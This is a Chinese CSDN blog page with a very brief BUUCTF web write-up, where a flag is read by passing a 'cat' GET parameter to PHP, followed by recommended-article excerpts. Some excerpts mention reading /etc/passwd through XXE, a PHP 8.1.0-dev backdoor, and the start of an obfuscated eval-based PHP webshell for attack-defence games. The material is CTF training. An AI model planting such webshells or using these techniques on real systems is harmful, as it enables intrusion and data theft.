CUUCTF

最新推荐文章于 2024-08-13 01:05:25 发布
最新推荐文章于 2024-08-13 01:05:25 发布
阅读量150 收藏
点赞数
文章标签: bug
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73648645/article/details/128068418
版权

进入靶机就出现这样一个页面

 然后就先有F12查看源代码发现有一段特殊的代码

 我们发现这就和php语言有关系 是使用get  发送一段cat参数 再输出就行了

输出后就得到了Flag

 

 

水星记-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF web(一)
Lemon's blog
10-16 1万+
前言:最近参加了一场CTF比赛,菜的一批,接下来多练习web题、MISC、密码学,多思考,提高一下自己做题的思路,以及代码审计、编写脚本的能力。 [HCTF 2018]WarmUp 查看源码,发现<!--source.php-->,打开发现源码 <?php highlight_file(__FILE__); if (! empty($_REQUEST['file...
BUUCTF-rip
m0_64180167的博客
04-11 669
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
Cumtctf2021初夏赛
meteox的博客
08-08 1398
web web签到 根据返回版本信息 PHP/8.1.0-dev,搜索可知是存在后面的版本 验证存在后门 ls cat flag.php 别大E admin/admin弱口令登录,得到flag在flag.php 抓包发现 Content-Type: application/xml;charset=utf-8 X-Requested-With: XMLHttpRequest 可能有xxe漏洞,尝试读取/etc/passwd <?xml version="1.0"?> &
BUUCTF:N种方法解决
RMC131的博客
04-02 520
BUUCTF:N种方法解决 解压得到一个应用 先是打不开,傻傻地搞了个win7的虚拟机,结果还搞不开 用记事本打开试试,结果发现了base64 普通解密只得到乱码,但PNG引起了我的注意,可能是个图片 试了N个网站,最终拖鞋了 链接: base64解码 得到一个图片文件,打开得到一个二维码 扫二维码得KEY{dca57f966e4e31fd5b15417da63269} flag{dca57f966e4e31fd5b15417da63269} ...
CTF 你就是长不了
艺博东的博客
10-05 1万+
题目描述: 又有输入框咯,但是,你能提交长于10个字符的内容么? 1、点击输入183.129.189.60:10019 2、查看代码 3、maxlength="10"改为“17” 4、输入17位的数字---->Submit 5、提交之后,flag就出来了 6、OK flag{88c48ff4b554eca6c7f961490aea8373} 获取的key内容为(key内容为flag{}内的字符串)? 88c48ff4b554eca6c7f961490aea8373 ...
BUUCTF(web刷题记录一)
nareku的博客
04-16 8749
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
FBCTF平台搭建
单核CPU的小朋友的博客
11-02 4万+
自从入了安全的坑,就喜欢去各大CTF平台战斗==其实我也特别想拥有一个属于自己的CTF平台。直到我有一天发现了一个炫酷的平台——FBCTF。 首先你要使用Ubuntu来安装并运行这个平台。我在kali里装过,没装上去。好像是python的一个模块一直装不上跳错。至于别的操作系统我就没有试过了。。 这里官方钦定版本是ubuntu14.0.3.但是其实你ubuntu的版本在2016年之后的理论上都是可...
CTF-线下AWD-PHP大马
热门推荐
1cePeak
11-08 27万+
分享几个php大马  &lt;?php $GLOBALS['pass'] = "6d31b7d21395a26b8035fdd7b94bb070d5993de3";$func="cr"/*-/-*/."eat"./*-/-*/"e_fun"/*-/-*/."cti"/*-/-*/."on";$xbyte=$func/*-/-*/('$x','ev'/*-/-*/.'al'/
CTF平台搭建,欢迎来战!
单核CPU的小朋友的博客
11-21 4万+
今天闲来无事,就做了一个CTF平台,地址是http://www.czlgjbbq.top/GJCTF/index.php, 如果各位有兴趣,可以来挑战一下自己。 Welcome to mine CTF!
2024年TI杯E题-三子棋游戏装置方案分享-jdk123团队-附录树莓派opencv调用摄像头bug的解决,链接在文末
jdk12123的博客
08-08 366
首先,树莓派官网系统更新到bulleye后(之前是Buster),raspistill是不可用的,只能用libcamera-hello。如果你不修改/boot/config.txt的话,你的libcamera-hello是用不了的!当然这也是笔者踩坑的开始,因为只要你加入了dtoverlay=ov5647,你的opencv大概率就打不开摄像头了!后来,经过与官方客服的交流,得知是由于系统更新的问题,烧录2021的Buster系统,即可完美解决,树莓派Opencv调用摄像头的问题。
sgetrf M N is 103040 时报错,这是个bug么 lapack and Openblas the same,修复备忘
eloudy的专栏
08-08 376
M=N=103040时,调用 sgetrf_ 时,无论是 LAPACK 还是 OpenBLAS,都出错:openblas:lapack: 出现问题的应该是由于M和N相对数字太大,乘积超出32bit整数的表达范围,而接收此参数的类型其实为 unsigned long int,导致误传非常大的值后造成越界。如下是已经修复的代码,可以正常运行了: 遇到非负整数,比如阶数、数组下标等,尽量用 unsigned long int 类型;
【Qt】之【Bug】LNK2019: 无法解析的外部符号 __imp_FindWindowW
paxlhhh
08-12 204
ps:尝试pro添加-lUser32,没用。
Bug 解决 | 前端项目无法正确安装依赖?
weixin_48916444的博客
08-09 707
前端项目和后端项目一样,都需要用到很多第三方的类库依赖。如果输入命令后报错了,无法安装依赖,怎么办呢?这篇文章和大家分享了一般比较常见的几种问题及解决办法。
【解压既玩】PS3模拟器v0.0.32+战神3+战神升天+各存档 整合包 ,完美不死机,没有BUG,旷世神作,强力推荐
oQiXiao的博客
08-08 558
本文收集了战神3和升天两作,附存档,完美不死机,没有BUG,强烈推荐。战神3是圣莫尼卡公司的大作,PS3 上必玩的游戏之一。
odoo17 翻译一个小bug
fqfq123456的专栏
08-09 302
标红处,但在zh_CN.po中明显已经翻译过来了,采取暴力点的,直接把base下的base.pot删除,再更新一下,可以正常显示了。odoo17 翻译一个小bug
pytorch学习(十六):终——解释一些bug
最新发布
weixin_52307528的博客
08-13 422
是 PyTorch 中用于创建张量的基本函数。:这里 H 是高度,W 是宽度,C 是颜色通道数(例如,RGB 图像有 3 个通道)。这种转换是因为 PyTorch 期望的输入张量维度顺序是通道数在前(C x H x W),而 PIL 图像和 NumPy ndarray 的默认维度顺序是高度在前(H x W x C)。:当你处理图像数据时,特别是在数据加载和预处理阶段,你需要将图像数据(无论是 PIL 图像还是 NumPy ndarray)转换为 PyTorch 张量,并准备它们以供模型训练或推理使用。
Bug 解决 | 前端无法正确请求后端接口并得到响应?
weixin_48916444的博客
08-08 799
前端请求后端接口发现得到的响应不对,或者通过 f12 明明看到了后端的响应,但是前端页面无法正常的展示出来。这种情况该怎么排查呢?这篇我们就来好好的理一理!
8.7 day bug
qq_30898861的博客
08-08 288
审题不严谨好家伙,整了半天,再看一遍要求,原来是要建立一个空箭头函数,fo了fo了。
odoo17 base 模块升级小bug
fqfq123456的专栏
08-10 596
其它都还是那样,本想着是因为自己写的代码哪些没规范,就一点一点排除,最后想个方法,是不是base模块自身的升级功能引起的,就重新建新数据库,其它程序一点不安装,又重 新对base模块进行升级,问题依旧,噢,原来是这个原因,再看看base模块有什么不一样的,发现:、真怪了,只是在首次安装时进行了翻译,后面的多次升级没有,上面的一直是大写的administation,不知从哪里来的。这两天遇到一个奇对的问题,一升级包含base模块的模块,总会发现用户界面的翻译变成了英语大写,如下。内容动了,页面的却没动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值